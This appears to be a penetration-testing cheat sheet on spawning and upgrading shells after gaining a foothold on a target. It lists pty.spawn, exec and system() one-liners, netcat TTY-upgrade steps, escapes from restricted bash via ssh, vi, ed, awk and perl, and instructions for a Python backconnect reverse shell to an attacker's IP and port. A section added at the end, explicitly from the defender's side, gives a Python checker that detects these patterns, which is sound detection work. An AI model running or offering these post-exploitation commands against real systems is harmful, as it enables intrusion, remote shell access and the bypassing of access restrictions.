Hack$Notes
Spawning a Shell
Spawn a shell
The following commands can be used to spawn a shell once you have a foothold on the target.
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
script -qc /bin/bash /dev/null
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
exec "/bin/sh";
/bin/bash -i
exec "/bin/sh" # (From within IRB)
:!bash # (From within vi)
:set shell=/bin/bash # (From within vi, first step)
:shell # (From within vi, second step: drops into the shell set above)
!sh # (From within nmap)

Method (upgrading the spawned shell to a fully interactive TTY):

=================== On Kali ===================
CTRL+z <--- place the netcat connection to background
stty raw -echo <--- on your terminal
fg <--- bring back the terminal
stty -a <--- make a note of rows, columns
=================== On Target ===================
export SHELL=bash
export TERM=xterm-256color OR export TERM=xterm
stty rows 38 <--- from notes above.
stty columns 116 <--- from notes above.
Python PTY Shells
Clone the repo https://github.com/infodox/python-pty-shells.git
On kali:
1) Make changes to reflect your IP and PORT on tcp_pty_backconnect.py file
2) Pass this file to the target.
3) python tcp_pty_shell_handler.py -b IP:PORT
On target:
1) python tcp_pty_backconnect.py

Escaping RBASH (Restricted Bash)

##############################################
ssh <user>@<IP-Address> -t "bash --noprofile"
##############################################
vi
:set shell=/bin/bash
:shell
##############################################
cd /home
echo $SHELL
ed
!'/bin/bash'
pwd
##############################################
awk 'BEGIN {system("/bin/bash")}'
cd /home
cd ~
pwd
##############################################
perl -e 'system("/bin/bash");'
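A defender-side companion to the commands in these notes, added here and not part of the original page: a small Python checker that classifies constructed process-execution records for the patterns listed above (an interpreter or editor spawning an interactive shell, the ssh `bash --noprofile` rbash bypass, and the pty.spawn/system() one-liners). The record format, rule names and sample events are assumptions for the example, not real telemetry.

```python
import re
from typing import List, Optional, Tuple

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
# Interpreters and editors the notes above use as a springboard into a shell.
SPRINGBOARDS = {"python", "python2", "python3", "perl", "ruby", "irb", "lua",
                "awk", "gawk", "mawk", "vi", "vim", "ed", "nmap", "script"}
# One-liner forms: pty.spawn, os.system, awk/perl system("/bin/..."), perl/ruby exec "/bin/...".
ONELINER = re.compile(r"pty\.spawn\(|os\.system\(|system\([\"']/bin/|exec\s+[\"']/bin/")

def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]

def classify(parent: str, cmdline: str) -> Optional[str]:
    """Name the rule an exec event matches, or None if it looks unremarkable."""
    argv = cmdline.split()
    if not argv:
        return None
    prog, args = _basename(argv[0]), argv[1:]
    # Rule 1: an interactive shell (no "-c script") whose parent is an interpreter or editor.
    # "sh -c ..." children are skipped on purpose: subprocess(shell=True) is everyday noise.
    if prog in SHELLS and "-c" not in args and _basename(parent) in SPRINGBOARDS:
        return "interpreter-spawned-shell"
    # Rule 2: shell started by sshd with profile processing disabled (the rbash bypass above).
    if prog in SHELLS and _basename(parent) == "sshd" and {"--noprofile", "--norc"} & set(args):
        return "ssh-forced-noprofile-shell"
    # Rule 3: the interpreter one-liners themselves, visible in the launching command line.
    if ONELINER.search(cmdline):
        return "inline-shell-spawn-oneliner"
    return None

def scan(events: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (rule, parent, cmdline) for every event that matches a rule."""
    return [(r, p, c) for p, c in events if (r := classify(p, c))]

# Constructed (parent process name, child command line) records, not real telemetry.
SAMPLE_EVENTS = [
    ("bash",    "ls -la /var/log"),                                 # benign
    ("python3", "/bin/sh -c ls"),                                   # benign: shell=True helper
    ("sshd",    "-bash"),                                           # benign: ordinary login shell
    ("bash",    'python3 -c import pty; pty.spawn("/bin/sh")'),     # rule 3
    ("python3", "/bin/sh"),                                         # rule 1
    ("bash",    'awk BEGIN {system("/bin/bash")}'),                 # rule 3
    ("vi",      "/bin/bash"),                                       # rule 1
    ("sshd",    "bash --noprofile"),                                # rule 2
]

if __name__ == "__main__":
    for rule, parent, cmd in scan(SAMPLE_EVENTS):
        print(f"{rule:28} parent={parent:8} cmd={cmd}")
```

In a real deployment the parent/child pairs would come from auditd EXECVE records or an EDR process tree; the "-c" exclusion keeps subprocess(shell=True) wrappers out of the alert stream.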